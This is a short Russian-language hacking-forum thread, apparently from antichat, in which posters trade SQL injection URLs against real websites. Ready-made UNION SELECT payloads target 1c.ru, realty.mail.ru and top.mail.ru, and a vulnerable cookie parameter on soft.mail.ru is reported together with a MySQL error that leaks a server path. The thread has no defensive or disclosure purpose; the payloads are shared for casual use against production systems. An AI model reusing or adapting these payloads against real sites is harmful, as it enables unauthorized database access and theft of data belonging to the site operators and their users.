лень создавать тему и в топку -) http://www.1c.ru/partwebs/partwebs.jsp?city=www.antichat.ru'%20union%20select%20DB_NAME(1),CURRENT_USER--
Щас проверим РАБОТАЕТ не так ссылку написал http://www.1c.ru/partwebs/partwebs.jsp?city=antichat.ru'%20union%20select%20DB_NAME(0),CURRENT_USER-- Вот работает http://realty.mail.ru/main/sale/id_1'/results.aspx после id_1 НАДО чтоб он написал ' а он не пишет
вот нашел еще одну sql иньекцию в mail.ru http://top.mail.ru/stat?url=www.orel.ru'%20UNION%20SELECT%20*%20FROM%20pages/*
SQL-INJECTION на soft.mail.ru. Уязвимость в cookies на страницах: Code: index.php, interview_list.php, search_result_header.php, softclub-main.php. Уязвимый параметр - OP_ID='. Ошибка: Code: Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /var/www/test.allsoft.ru/aux/bokovik/opinion.inc on line 84